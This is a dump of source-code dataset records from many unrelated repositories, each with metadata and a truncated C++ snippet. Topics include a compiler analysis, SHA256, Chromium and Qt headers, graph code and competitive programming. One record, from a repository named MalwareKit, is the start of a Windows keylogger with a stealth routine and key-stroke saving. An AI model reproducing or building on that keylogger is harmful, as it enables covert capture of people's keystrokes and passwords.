brandon2davincci@gmail.com
6f7a0ae142548aa2eb10bf185057b2e579b3413e
df45c9dcb30606d4177cc4aaad312a0dca3121fd
/src/infer/Analysis.cpp
00bb75d85e2be1e630f4e215672f3e6bff17bd7b
[ "MIT" ]
permissive
iitalics/Opal
3909ac2906a4fdaad8e36e2af8e27e65c42aca7b
205689d1710a265da4fa3e74a03ca65b05671e30
refs/heads/master
2021-06-21T00:41:53.943039
2017-02-17T12:11:59
2017-02-17T12:11:59
39,413,451
26
0
null
null
null
null
UTF-8
C++
false
false
7,887
cpp
#include "Analysis.h" #include "../env/Namespace.h" namespace Opal { namespace Infer { ; Analysis::Analysis (Env::Function* fn, Analysis* _call) : parent(fn), nm(fn->nm), _ctx(nm) , _calledBy(_call), _finished(false), _temps(0) { ret = parent->ret = Type::poly(); env = parent->localEnv = new LocalEnv()...
[ "iitalics@gmail.com" ]
iitalics@gmail.com
3507731344aaf2d1981feb2c6f3e0da70d2cd344
b6e102999e1b0bde643911c285e395e395823d2e
/KoishiEx/sha256.cpp
14f4fd861c7c53ab9fcd36c54eb0f9fb741ba6bb
[]
no_license
404neko/KoishiEx_MinGW
5505afa511f0594f2a6b981a115f67d2ea3e744b
df446b0a667f7689476445422d74b24331387984
refs/heads/master
2020-03-19T10:54:49.546539
2018-06-07T02:39:30
2018-06-07T02:39:30
136,411,825
0
0
null
null
null
null
UTF-8
C++
false
false
13,191
cpp
#include "sha256.h" /// same as reset() using namespace KoishiSHA256; SHA256::SHA256() { reset(); } /// restart void SHA256::reset() { m_numBytes = 0; m_bufferSize = 0; // according to RFC 1321 m_hash[0] = 0x6a09e667; m_hash[1] = 0xbb67ae85; m_hash[2] = 0x3c6ef372; m_hash[3] = 0xa54ff53a; m_has...
[ "404neko@gmail.com" ]
404neko@gmail.com
b19d4600d26e5f7f2a5069429cca366eacdc6a91
6d9413be63d2d1d93bd6a258f38f0d3159326e8d
/Source/AxisAlignedPlane.h
7e22d4e05c73f74b0ec930c60c866bebe752d3af
[ "MIT" ]
permissive
ithron/VolViz
ad0a2dcb9dc58acce02b0a84899c86dd27829eef
e79f36563d908d9ba1bd71c3e760792521dd5e7a
refs/heads/develop
2020-05-21T20:47:39.022548
2018-10-22T13:21:57
2018-10-22T13:21:57
60,333,414
0
0
MIT
2018-07-26T08:08:56
2016-06-03T08:54:16
C
UTF-8
C++
false
false
433
h
#pragma once #include "Geometry.h" namespace VolViz { namespace Private_ { class VisualizerImpl; class AxisAlignedPlane : public Geometry { public: AxisAlignedPlane(AxisAlignedPlaneDescriptor const &descriptor, VisualizerImpl &visualizer); protected: virtual void doInit() override; virtua...
[ "sre@informatik.uni-kiel.de" ]
sre@informatik.uni-kiel.de
b3933e46af35a659e3927207d5d87457cd8a6572
95ab8a21dda989fde5b0796d1488c30128a01391
/CodeForces/C++/1343D.cpp
11d7d831d792841c5eeeecac49c01bfc609ada4a
[]
no_license
neelaryan2/CompetitiveProgramming
caa20ffcdee57fb2e15ceac0e7ebbe4e7277dc34
959c3092942751f833b489cc91744fc68f8c65d2
refs/heads/master
2021-06-28T14:10:50.545527
2021-02-15T17:34:03
2021-02-15T17:34:03
216,887,910
2
1
null
null
null
null
UTF-8
C++
false
false
1,173
cpp
#include <bits/stdc++.h> using namespace std; using ll = long long; using pii = pair<int, int>; using vi = vector<int>; #define mp make_pair #define fi first #define se second #define pb push_back #define eb emplace_back #define all(v) (v).begin(), (v).end() const ll N = 1e18; void solve() { int n, k; cin >> n ...
[ "neelaryan2@gmail.com" ]
neelaryan2@gmail.com
23f611f44792112aea0e9f68c1e038cde53cd729
5145d166dbb699a8f75c4b9d9614002607ae0597
/algos_assignment/2nd_grade/임수민_jennylsm/week5/2178.cpp
9dc76ae9bdfcc6721cfb16c756f002304577db69
[]
no_license
Sookmyung-Algos/2021algos
8cedfb92d8efaf4f6241dece5bc9b820fc5dc277
be152912517558f0fc8685574064090e6c175065
refs/heads/master
2022-07-21T03:47:38.926142
2021-12-02T01:35:13
2021-12-02T01:35:13
341,102,594
11
46
null
2021-12-02T01:35:14
2021-02-22T06:32:53
C++
UTF-8
C++
false
false
1,372
cpp
#include <iostream> #include <string> #include <queue> using namespace std; int map[100][100]; int visited[100][100]; int dir[4][2] = { {1,0}, {-1,0}, {0,1}, {0,-1} }; // 상,하,좌,우 int maxX = 0; int maxY = 0; bool isValid(int x, int y) { if (visited[x][y] == 0 && 0 <= x && x < maxX && 0 <= y && y < maxY && map[x][y]...
[ "noreply@github.com" ]
Sookmyung-Algos.noreply@github.com
138ca770fb66a36be1bf91dd3ebcedab0b288c52
03a957f10754ae97d998b9a5af01e0ec43a36409
/src/chrome/browser/google/google_url_tracker_navigation_helper.h
26b7a5348762a03183fa1147e7fcec73aa292250
[ "BSD-3-Clause" ]
permissive
xph906/TrackingFree
e5d39ced8909380ec29a38f0776814f762389aea
41540f0bdc8e146630f680d835a4107e7b8fd2c4
refs/heads/master
2021-01-19T11:43:34.409514
2014-05-21T01:54:24
2014-05-21T01:54:24
19,993,612
1
1
null
null
null
null
UTF-8
C++
false
false
1,951
h
// Copyright (c) 2012 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #ifndef CHROME_BROWSER_GOOGLE_GOOGLE_URL_TRACKER_NAVIGATION_HELPER_H_ #define CHROME_BROWSER_GOOGLE_GOOGLE_URL_TRACKER_NAVIGATION_HELPER_H_ class Goo...
[ "xiangpan2011@u.northwestern.edu" ]
xiangpan2011@u.northwestern.edu
9940a8a1abe6c9ce266ed8bd3b6d9cebfbcaaab9
046dfbfb4a325a6e78dfc53a6dcfef7455c091a4
/Hawkeye_VideoPlayer/Hawkeye_VideoPlayer/Hawkeye_VideoPlayerDlg.cpp
d208c3817192c3426cdcb06e462c35299786ffe6
[]
no_license
stevenyeun/Hawkeye2017
df6b6c739d5e18455a0a05ca80c0f313f8d7e9a8
f6fa2d509cca08d432ec7b61c87d1abb51d4bb98
refs/heads/master
2021-10-09T15:35:59.973499
2018-12-30T20:26:59
2018-12-30T20:26:59
106,183,484
0
0
null
null
null
null
UTF-8
C++
false
false
3,275
cpp
// Hawkeye_VideoPlayerDlg.cpp : implementation file // #include "stdafx.h" #include "Hawkeye_VideoPlayer.h" #include "Hawkeye_VideoPlayerDlg.h" #include "afxdialogex.h" #ifdef _DEBUG #define new DEBUG_NEW #endif // CHawkeye_VideoPlayerDlg dialog using namespace std; #include "../Hawkeye_HWDecodin...
[ "mryeun@outlook.kr" ]
mryeun@outlook.kr
ee5f8752de68cb77bf63d11328d951854bebf1f0
70e77ade2f6a43afc95adb203231ffc4a539275c
/benchmarks/QLinkedList/list_end_bug/main.cpp
de05cc2b7c0c0e137ced083459e04448e2b7b768
[]
no_license
xsery/benchmarks-esbmc-qt
95083d1c75b11e276ce8c0b40be261c57a60d20f
6ad57b7b4e4c6f0fb4fdfdfe67ac13a35f5c45ad
refs/heads/master
2020-12-25T12:17:25.754739
2015-09-21T03:11:36
2015-09-21T03:11:49
null
0
0
null
null
null
null
UTF-8
C++
false
false
356
cpp
// QLinkedList::begin/end #include <iostream> #include <QLinkedList> #include <cassert> using namespace std; int main () { int myints[] = {75,23,65,42,13}; QLinkedList<int> myQLinkedList (myints,myints+5); QLinkedList<int>::iterator it; it = myQLinkedList.end(); it--; assert(*it != 13); ...
[ "rms.felipe@gmail.com" ]
rms.felipe@gmail.com
0a953edfefda9f29227997e78c4ef000b3213ca5
d736045af533b9e471899d3629117ba6bf356270
/baekjoon/1181.cpp
15ac7c99b382176a3bf68ec7a8e06d5b9d92bb30
[]
no_license
devOTTO/Algorithm-Study
1d74ace742aafa69639227d43392a3c0dca9f0b0
52cacaaf0911e1c5f9a90d15c578cc687587cb3d
refs/heads/master
2020-04-27T01:07:58.593395
2020-01-13T12:56:31
2020-01-13T12:56:31
173,956,434
1
0
null
null
null
null
UTF-8
C++
false
false
898
cpp
// // Created by 융미 on 2019-05-28. //*1181 단어 정렬 #include <iostream> #include <set> #include <vector> #include <string> #include <algorithm> using namespace std; int n; //comparator 작성 bool com(string a, string b) { if(a.length() < b.length()) return true; if(a.length() == b.length()){ if(a < b) retur...
[ "yoongotto@gmail.com" ]
yoongotto@gmail.com
e64f8d4efb879652357e6f45312e720f0e9938bc
3052501f53500db1ba29084494b0c0b463419b08
/src/host/graph.cpp
141ec4c6ea8c9307e0c866df9686b4d2da4974fe
[]
no_license
lucaparmigiani/RWR_GPU
30f9b45d9205586b893e60655af7fe1bb0f6f8dc
72b45558e84854a2ce05477ad8757be2b66c596f
refs/heads/master
2022-11-26T04:20:35.713998
2020-08-09T14:02:04
2020-08-09T14:02:04
279,167,137
0
0
null
null
null
null
UTF-8
C++
false
false
1,762
cpp
#include "graph.h" Graph::Graph(const int _V) : V(_V) { degree = new int[V](); } void Graph::info(){ std::cout << "Graph info:"<< '\n'; std::cout << "\tNumber of Nodes\t\t" << V << '\n'; std::cout << "\tNumber of Edges\t\t" << E << '\n'; std::cout << "\tNumber of Non zero\t" << nnz << '\n'; }...
[ "luca.parmigiani@studenti.univr.it" ]
luca.parmigiani@studenti.univr.it
81f1b457c256e61094a07c44a9923bf8d9061b7a
303c22dd001c3634bd2c80fe22b5468b82ae641f
/cses/graph_Algorithms/counting_Rooms.cpp
61e0b9ca43acd779209e3ed8e6de2339b2ba5f88
[]
no_license
VaibhavSaraf/Algorithms
8551b35f1fe7c0af1a67df43e532b6f481f5a2d7
72acf2e84267d4e6696e955bf0527e37a0063619
refs/heads/master
2023-06-05T23:09:41.735584
2021-07-05T08:21:27
2021-07-05T08:21:27
261,447,982
3
1
null
null
null
null
UTF-8
C++
false
false
1,027
cpp
#include <bits/stdc++.h> using namespace std; #define OJ \ freopen("input.txt", "r", stdin); \ freopen("output.txt", "w", stdout); int n, m; char grid[1001][1001]; bool visited[1001][1001]; bool isValid(int x, int y) { if (x < 1 || x > n || y < 1 || y > m) return false; ...
[ "vaibhavgsaraf@gmail.com" ]
vaibhavgsaraf@gmail.com
8576babf4d84718c8ea03f6cc354acae5de60884
b13e4b4d3918960c9f92ad448c78a9faf91808b5
/Fluid_Solver/DEMO/demo.cpp
9cac25ba1a7f00ea58d830154f211eb42684a50e
[]
no_license
benzemann/Fluid_simulation-SPH_and_DSC-
bd671581622c3484f3d0274fe401a2144b1b734e
b4cc863a5be237086174d980213b04eb0f1f5bc4
refs/heads/master
2021-01-21T04:42:30.650666
2016-06-15T19:02:33
2016-06-15T19:02:33
44,990,608
0
0
null
null
null
null
UTF-8
C++
false
false
2,130
cpp
// // Deformabel Simplicial Complex (DSC) method // Copyright (C) 2013 Technical University of Denmark // // This program is free software: you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation, either version 3 of the License...
[ "bentzen.jeppe@gmail.com" ]
bentzen.jeppe@gmail.com
a81c61216aa23f4d42414b2d3b68c1d44f62a80c
270f78a10197a736710daeaa824f2b5e5c0c8a20
/src/sparse_tool/iterative/cocg.hxx
aa78a539f3268da4a69e868e6b1852a305d9a2c4
[]
no_license
ceccocats/LapackWrapper
d704906b676821674ea07a6f106f0f65d9821e68
fea6aa41849ffe5440fa3195c36f74e45e36b414
refs/heads/master
2020-12-20T09:08:30.440389
2019-10-15T15:33:24
2019-10-15T15:33:24
236,025,055
0
0
null
2020-01-24T15:10:34
2020-01-24T15:10:33
null
UTF-8
C++
false
false
2,544
hxx
#ifndef SPARSETOOL_ITERATIVE_COCG_HH #define SPARSETOOL_ITERATIVE_COCG_HH using namespace std; namespace SparseTool { /* // #### #### #### #### // # # # # # # # # // # # # # # // # # # # # ### // # # # # # # # # // #### #### #### ##...
[ "enrico.bertolazzi@unitn.it" ]
enrico.bertolazzi@unitn.it
7d13c226080573b47f7b9a7ab30623e8a4bae1bb
cabeeff2ff02f82ddca6aefd7857db86cd60cda9
/include/AppInfo.hpp
ef6e8a4bdd68d1ee0ae1ea03a1dd58b2abde4cf9
[]
no_license
a353566/Statistics-of-Memory-Information
a6c3512c18ea5f53ac506702c403a19e859a5eb6
a6e63d6eaceea9a1485149f19f0d1754611187f4
refs/heads/master
2020-03-12T06:11:40.001197
2019-05-05T15:56:21
2019-05-05T15:56:21
130,479,963
0
0
null
null
null
null
UTF-8
C++
false
false
2,981
hpp
#ifndef APP_INFO_HPP #define APP_INFO_HPP #include <vector> #include <string.h> #include <iostream> #include "tool/SubCharArray.hpp" using namespace std; /** class App * 單一 app 的所有資訊 * 其中名字是用 point 的方式指向 appNameVec 其中一個真正的名字 * name|pid|TotalPss|oom_score|ground|oom_adj * TotalPss|oom_score|ground|oo...
[ "a353566@gmail.com" ]
a353566@gmail.com
5209f09526b24e5923b9d49db25ca888286fbed9
5b9f3e1f34bf96299ccf7c9de54ded1399dc905e
/node_modules/nodegit/include/config_entry.h
e48808dc86b479d4edf51a6b862a7f8a1c72867f
[ "MIT" ]
permissive
rahulgautam21/Chat-Server-Computational-Engine
4a38f5ba931558f0543b47590069ba41a63b0102
b55f0b56be8a4ce94689c27af9dbeec43fe0b24c
refs/heads/master
2021-01-10T04:54:31.994338
2016-04-03T06:20:14
2016-04-03T06:20:14
55,319,000
0
0
null
null
null
null
UTF-8
C++
false
false
1,320
h
// This is a generated file, modify: generate/templates/class_header.h #ifndef GITCONFIGENTRY_H #define GITCONFIGENTRY_H #include <nan.h> #include <string> #include <queue> #include <utility> #include "async_baton.h" #include "promise_completion.h" extern "C" { #include <git2.h> } #include "../include/typedefs.h" ...
[ "rahul.gautam21@gmail.com" ]
rahul.gautam21@gmail.com
3eee74d0db49eeedceb700eff7985a3c45f01291
f8c1bb8cf163245118192eef9fe41bc980c0e697
/ArraySum.cpp
2c70a8cb1798ffc00d54b8d029302b8a767022d1
[]
no_license
Lakshmi-Manasa-git/FreshCodacy
a68a20f6530189dca2ffba348eb9bf343bdbbe99
3a7212ae1ba4d235d7d2f3e6d1be272206e946a1
refs/heads/main
2023-06-20T20:42:18.960898
2021-07-14T09:49:03
2021-07-14T09:49:03
372,476,588
0
0
null
null
null
null
UTF-8
C++
false
false
591
cpp
/* C++ Program to find sum of elements in a given array */ #include <bits/stdc++.h> using namespace std; // function to return sum of elements // in an array of size n int sum(int arr[], int n) { //test int sum = 0; // initialize sum // Iterate through all elements // and add them to sum for (int i...
[ "noreply@github.com" ]
Lakshmi-Manasa-git.noreply@github.com
f2cf9e6f95eeaea55f66a5424b1e48e806bf3820
6911d7ba9eb53bd885917e6fbed8eec694f00488
/2013TGS07班/TGS_Team7_Projects_Ver1.17/TGS_Team7_Projects/Souse/Input/JoyStickState.h
7b1aaf8a6a9da40e829dedc187c9bb3c348ed443
[]
no_license
KORYUOH/koryuohproject-svn-server
86fc2128546bb6000af65f65e210775004cd03fc
eea045863cab70fc8534917b6a1356690e6fc10e
refs/heads/master
2021-01-19T13:25:33.993255
2015-04-04T08:10:21
2015-04-04T08:10:21
32,276,044
0
0
null
null
null
null
SHIFT_JIS
C++
false
false
2,990
h
/****************************************************************************** * File Name : JoyStickState.h Ver : 1.00 Date : 2012-12-14 * * Description : * * ジョイスティック入力クラス. * * Author : Shouta Takemura. * ******************************************************************************/ #if...
[ "coyamasss@00f2200d-f7a8-dc77-c299-15437ac5ebba" ]
coyamasss@00f2200d-f7a8-dc77-c299-15437ac5ebba
3dffb9185e3eb7587f069f31bc2b43e3418713b5
4497624912a7af7dbdb800e9c0b152af1cca2655
/779A.cpp
f5c0eea186cafa8a6cf2bfb74efe36b2c48dab4d
[]
no_license
singhaditya8499/Codeforces
0a978ea628660e18188856671e742a4cfec7cb28
b73e9654b319580648c016659a915174615a6ed5
refs/heads/master
2021-05-18T12:22:21.857546
2020-04-22T19:14:30
2020-04-22T19:14:30
251,241,430
1
0
null
null
null
null
UTF-8
C++
false
false
304
cpp
#include<bits/stdc++.h> using namespace std; long long n,s[105],s1[105],ans,x,y; int main() { cin>>n; for(int i=0;i<n;i++) { cin>>x; s[x]++; } for(int i=0;i<n;i++) { cin>>y; s1[y]++; } for(int i=1;i<=5;i++) { if(abs(s1[i]-s[i])%2==1) { cout<<-1; return 0; } ans+=abs(s1[i]-s[i])/2; } cout<<ans/2<<endl; }
[ "singh.aditya8499@gmail.com" ]
singh.aditya8499@gmail.com
d88a344f560e1ad44725a47a6c7b6a1c90346640
e47cd0db56b50097a5e58d3eea6e9ca04a668f98
/src/map.cc
582ea816fa1d32741fc7554ef1b67348cc3b175a
[]
no_license
bentglasstube/ld36
0029175336e7c5ff6f413968163362c1b9a87200
e2c34c0ebda0745fdbe524a07741f1fc1b2a302b
refs/heads/master
2020-12-08T09:14:01.045888
2017-07-04T18:58:49
2017-07-04T18:58:49
66,772,341
0
1
null
2017-07-03T22:16:36
2016-08-28T14:23:57
C++
UTF-8
C++
false
false
902
cc
#include "map.h" #include <stdlib.h> #define STB_PERLIN_IMPLEMENTATION 1 #include "stb_perlin.h" Map::Map() { for (int x = 0; x < 640; ++x) { heights_[x] = 0; } } void Map::generate_terrain() { const float y = rand() / static_cast<float>(RAND_MAX); for (int x = 0; x < 640; ++x) { heights_[x] = 250;...
[ "alan@eatabrick.org" ]
alan@eatabrick.org
7949af34ae2935c44724616f4400c184eb0c7813
ac1c9fbc1f1019efb19d0a8f3a088e8889f1e83c
/out/release/gen/skia/public/mojom/bitmap.mojom-blink-test-utils.h
2cf60a87c314cf0e043c4197ca002d021a36a23a
[ "BSD-3-Clause" ]
permissive
xueqiya/chromium_src
5d20b4d3a2a0251c063a7fb9952195cda6d29e34
d4aa7a8f0e07cfaa448fcad8c12b29242a615103
refs/heads/main
2022-07-30T03:15:14.818330
2021-01-16T16:47:22
2021-01-16T16:47:22
330,115,551
1
0
null
null
null
null
UTF-8
C++
false
false
637
h
// skia/public/mojom/bitmap.mojom-blink-test-utils.h is auto generated by mojom_bindings_generator.py, do not edit // Copyright 2019 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #ifndef SKIA_PUBLIC_MOJOM_BITMAP_MOJOM...
[ "xueqi@zjmedia.net" ]
xueqi@zjmedia.net
b0de75e2b43f32cf69091d66ff2edc6ab756dfed
3306ffb058ea67d4140dcbc641a735d3cafdfd68
/src/qt/optionsmodel.h
a7e3dd408725cb650227f4998f4ee6dab9f977b1
[ "MIT" ]
permissive
niobiumcoin/niobiumcoin
a98f724f3f5047ff6cdda4aba2d5e7e6ddf6fd44
b6f3d8691231f51aa83c119740fb0971d764267a
refs/heads/master
2019-07-12T20:14:00.837924
2017-11-21T19:59:34
2017-11-21T19:59:34
107,165,666
2
4
null
null
null
null
UTF-8
C++
false
false
2,945
h
// Copyright (c) 2011-2013 The Bitcoin developers // Distributed under the MIT/X11 software license, see the accompanying // file COPYING or http://www.opensource.org/licenses/mit-license.php. #ifndef OPTIONSMODEL_H #define OPTIONSMODEL_H #include <QAbstractListModel> extern bool fUseBlackTheme; QT_BEGIN_NAMESPACE ...
[ "dev@niobiumcoin.org" ]
dev@niobiumcoin.org
610626dbf2a5d36beedbc26a90444e8d8aba1294
2061d5ccea97aee9b92e267cf6f47a9a7700c67f
/exec/catkin_ws/install/ssafy_msgs/include/ssafy_msgs/msg/hand_control__rosidl_typesupport_opensplice_cpp.hpp
db5c82f95c26de83fa8cff8461e65541afb9f304
[]
no_license
lovelyunsh/ggobugi
23630286453b00d3200b2eee547b8447ede449de
19de6b0070f533917f1a665b69fe0eec0749ba0b
refs/heads/master
2023-06-13T04:02:05.245161
2021-07-11T09:25:30
2021-07-11T09:25:30
384,886,343
0
0
null
null
null
null
UTF-8
C++
false
false
2,647
hpp
// generated from rosidl_typesupport_opensplice_cpp/resource/idl__rosidl_typesupport_cpp.hpp.em // generated code does not contain a copyright notice #ifndef SSAFY_MSGS__MSG__HAND_CONTROL__ROSIDL_TYPESUPPORT_OPENSPLICE_CPP_HPP_ #define SSAFY_MSGS__MSG__HAND_CONTROL__ROSIDL_TYPESUPPORT_OPENSPLICE_CPP_HPP_ // generated f...
[ "lovelyunsh@naver.com" ]
lovelyunsh@naver.com
280ce912bc9075703917ff151cf2860621b57e88
53c4e64c6c3f7e85dbb78b96fe4d53aef3524f7b
/Collision.cpp
e9c90a6131cf5a72df65192e3e1b084ee88bc68b
[]
no_license
ska9641/20151695
2d9feddf6dd237e7b79057a76620421945dd0255
ae972e10670e50879c680190acdf33e0f6c40672
refs/heads/master
2021-01-09T06:38:46.833097
2016-06-14T02:18:23
2016-06-14T02:18:23
61,084,266
0
0
null
null
null
null
UTF-8
C++
false
false
1,850
cpp
#include "Collision.h" Collision::Collision() { } Collision::~Collision() { } bool Collision::CollisionOBJ(CObject * _obj1, CObject * _obj2) { if (_obj1->GetnLi() && _obj2->GetnLi()) { if (_obj1->Position->GetnX() == _obj2->Position->GetnX() && _obj1->Position->GetnY() == _obj2->Position->Get...
[ "noreply@github.com" ]
ska9641.noreply@github.com
8e6432c848d52f958b899a3e997242cb43ac3ec2
5d42a2148379c159968801c9cb6c7bd655c02ad0
/src/lib/dimbo/app/options/options_description.cpp
73d1a9e9ff58d254b05de39a8da3e9f56caba647
[ "MIT" ]
permissive
ptomulik/dimbo
a6415d0c050007921cd75e5c1bfbe856c6c295e4
6a810b39916be9c3f9157f27b63f8713598ccf6b
refs/heads/master
2021-01-02T09:52:22.815197
2014-06-12T15:07:35
2014-06-12T15:07:35
15,337,305
0
0
null
null
null
null
UTF-8
C++
false
false
2,258
cpp
/* * @COPYRIGHT@ * * Permission is hereby granted, free of charge, to any person obtaining a * copy of this software and associated documentation files (the "Software"), * to deal in the Software without restriction, including without limitation * the rights to use, copy, modify, merge, publish, distribute, subli...
[ "ptomulik@meil.pw.edu.pl" ]
ptomulik@meil.pw.edu.pl
1844a7009916ba15ae79e125f2186cf02ead7412
e71baef31844ca5eccc28485443a4a735df9f3ba
/far_out_sensor_sounds/FFT_sender/FFT_sender.ino
8d6840409e6dcfd27b08254b32b1534221d6a65c
[]
no_license
cpethica/We-Are-Symphony
fa37fae64e202bcc482483083b153395aa003b76
fc4bda16276752de5abb7b3e576332210cbd9b4e
refs/heads/master
2021-05-12T19:20:20.829709
2018-10-08T09:27:56
2018-10-08T09:27:56
117,089,589
1
1
null
null
null
null
UTF-8
C++
false
false
5,639
ino
/* Example of use of the FFT libray Copyright (C) 2014 Enrique Condes This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later vers...
[ "charles@pethica.net" ]
charles@pethica.net
8d58c95f5152cc554bfc8faa65925702d7e7f94d
8722f2da8bc1a6b3e16ce5759f67ca292c0a7341
/src/ripple/types/IdentifierType.h
af551d861404238e2aa45644a61686d2f4d27799
[ "MIT", "MIT-Wu", "ISC", "BSL-1.0" ]
permissive
waynezu/vpal20
010fbec860b6c4d8c775b8d637730580e842d597
8deef35521417cd4405d7bbadd030b89bd4fb91b
refs/heads/master
2020-12-25T21:35:01.584301
2014-10-27T03:58:56
2014-10-27T03:58:56
null
0
0
null
null
null
null
UTF-8
C++
false
false
8,742
h
//------------------------------------------------------------------------------ /* Portions of this file are from Vpallab: https://github.com/vpallabs Copyright (c) 2013 - 2014 - Vpallab.com. Please visit http://www.vpallab.com/ This file is part of rippled: https://github.com/ripple/rippled C...
[ "meanz1235@gmail.com" ]
meanz1235@gmail.com
652d4940178fda5e367b43202db28a8d7ebf7e7d
413dd201543e0481dd690721fe0d378fa20e3197
/test/integration_tests/test_int_battery.cpp
6c6d59069eb367194e848f7108af6f9ca7b6f87d
[]
no_license
cgorton1313/gortobot
8cb6791550b9ced1b143b62b05ba649c70779890
935611b8bc3ca38fcea2564585ed5f8ae6681256
refs/heads/master
2021-01-19T02:21:27.029502
2019-09-25T02:33:50
2019-09-25T02:33:50
86,262,889
1
0
null
2019-08-06T14:35:41
2017-03-26T20:30:56
C++
UTF-8
C++
false
false
1,841
cpp
/* This test outputs voltage and status of a real battery */ #include "../../src/configs/consts.h" #include "../../src/configs/includes.h" #include <Arduino.h> uint16_t runNum; uint16_t loopCount = 0; const uint16_t BATTERY_TEST_WAIT_TIME = 6; uint32_t interval = 900; GbFix fix; GbRealBattery battery1 = GbRealBa...
[ "ncraiggorton@gmail.com" ]
ncraiggorton@gmail.com
b86984049f627aecc128b76e16d5280cadcfd0d6
6097e7cd1cd311ef13bd166d6323bbb749385291
/lib/String/main.cpp
c18119b0f9dbe0721973f7455072623d09d379bb
[]
no_license
ysripath/CPP
a9a33f6d89c759b68def91df084915cf78f525fd
009bb94561b267c87b5ab5b38fbddcd1670a42a5
refs/heads/master
2020-03-26T09:57:47.602806
2019-04-07T01:33:01
2019-04-07T01:33:01
144,774,285
0
0
null
null
null
null
UTF-8
C++
false
false
4,246
cpp
#include <iostream> #include "String.h" using namespace std; void testOutput(); void testCompare(); void testConcatenate(); void testSubStr(); void testCopy(); void testInput(); void testIndex(); void testClear(); void testFind(); void testc_str(); int main() { cout<<"HELLO WORLD"<<endl; String str("test"...
[ "yuvarajsripathi91@gmail.com" ]
yuvarajsripathi91@gmail.com
42ea40797ebfd8cbd95ffe73f08a591e5eda31b0
56723e610843cf5ad771647b6e572925e0c6b874
/C++/Keylogging/keylogger_extended.cpp
5bffee9067d2a67a486e5b0c8ebd8f15bef3b2cc
[]
no_license
jasoven/MalwareKit
048922a25baabbf76e01346205ae6bea60affab1
0a40ce99cf179c0558238c93809a16a8f0423637
refs/heads/master
2020-03-31T16:57:43.715694
2016-04-29T22:07:29
2016-04-29T22:07:29
152,399,489
1
0
null
2018-10-10T09:41:56
2018-10-10T09:41:56
null
UTF-8
C++
false
false
8,224
cpp
#define _CRT_SECURE_NO_WARNINGS #include <iostream> // These we need to #include <stdio.h> using namespace std; // include to get our #include <windows.h> // Keylogger working. #include <winuser.h> int Save(int key_stroke, char *file); void Stealth(); int main(){ //SetPriorityClass( GetCurrentProcess(), HI...
[ "mstankiewicz03@gmail.com" ]
mstankiewicz03@gmail.com
35943b9214e98567fb86a06049510dcbb6dcad66
c57819bebe1a3e1d305ae0cb869cdcc48c7181d1
/src/qt/src/3rdparty/webkit/Source/WebCore/rendering/RenderLayerBacking.cpp
a1c997f111be2d96e337c9fcd5cb9af253ac6620
[ "BSD-2-Clause", "LGPL-2.1-only", "LGPL-2.0-only", "Qt-LGPL-exception-1.1", "LicenseRef-scancode-generic-exception", "GPL-3.0-only", "GPL-1.0-or-later", "GFDL-1.3-only", "BSD-3-Clause" ]
permissive
blowery/phantomjs
255829570e90a28d1cd597192e20314578ef0276
f929d2b04a29ff6c3c5b47cd08a8f741b1335c72
refs/heads/master
2023-04-08T01:22:35.426692
2012-10-11T17:43:24
2012-10-11T17:43:24
6,177,895
1
0
BSD-3-Clause
2023-04-03T23:09:40
2012-10-11T17:39:25
C++
UTF-8
C++
false
false
56,749
cpp
/* * Copyright (C) 2009 Apple Inc. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions a...
[ "ariya.hidayat@gmail.com" ]
ariya.hidayat@gmail.com
fac639db32908a7c035a8d8c834552e64455248e
1a9f16b2e3cd3955995f29c6e123c93c2fc00297
/HOOPles3_4tussenstand/src/Particle.h
f15508b436585bdd0b66e5ae1cd6968268d1dff3
[]
no_license
ThomasMeiborg/HeavyOOPnieuw
804922132807b2496a52f96cc2ffcb81da1bf1cd
df908684ba388f61d70cc06e5f97131cc9187006
refs/heads/master
2021-01-12T12:05:20.841673
2016-10-31T05:34:48
2016-10-31T05:34:48
69,230,619
0
0
null
null
null
null
UTF-8
C++
false
false
452
h
#pragma once #include "ofMain.h" class Particle { public: Particle(int startX, int startY); virtual void move(); void draw(); void setColours(ofColor center, ofColor inner, ofColor outer); protected: ofPoint position; float radius; ofVec2f speed; ...
[ "tp.meiborg@gmail.com" ]
tp.meiborg@gmail.com
8b9ddd2f3993b534f038f0dc4852abe5a531c8c3
069b6c1e4e5a445235f49417ade6e5c3f79bb58d
/branches/2.4x/client/SFVReader.h
ae5abc5fce70d9a4c2b197c518456a34783d2e6f
[]
no_license
BackupTheBerlios/airdc-svn
65a99494d5267ecb2ad96f21ead0299e7811131c
17236498160afe8dc317bb75db374be8234eb541
refs/heads/master
2021-01-01T17:56:34.167869
2013-10-16T13:01:20
2013-10-16T13:01:20
40,718,655
0
0
null
null
null
null
UTF-8
C++
false
false
2,169
h
/* * Copyright (C) 2001-2013 Jacek Sieka, arnetheduck on gmail point com * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later ...
[ "maksis@d6773c42-f83c-be49-aa62-2d473f764b1f" ]
maksis@d6773c42-f83c-be49-aa62-2d473f764b1f
71f7642cae50076a160ee0d0e5699b9535f67860
9fad4848e43f4487730185e4f50e05a044f865ab
/src/chrome/browser/chromeos/policy/remote_commands/screenshot_delegate.cc
0c9784cdd6e5233e2ad529761808d2ccd3fe65ba
[ "BSD-3-Clause" ]
permissive
dummas2008/chromium
d1b30da64f0630823cb97f58ec82825998dbb93e
82d2e84ce3ed8a00dc26c948219192c3229dfdaa
refs/heads/master
2020-12-31T07:18:45.026190
2016-04-14T03:17:45
2016-04-14T03:17:45
56,194,439
4
0
null
null
null
null
UTF-8
C++
false
false
2,940
cc
// Copyright 2015 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #include "chrome/browser/chromeos/policy/remote_commands/screenshot_delegate.h" #include "base/memory/ptr_util.h" #include "chrome/browser/browser_proces...
[ "dummas@163.com" ]
dummas@163.com
1aedb55c6dc7a388ef92a77accaef3731c7c43c6
4a881331c54042184b284eab826f623c3eaeae62
/wavesightGUI16/main.cpp
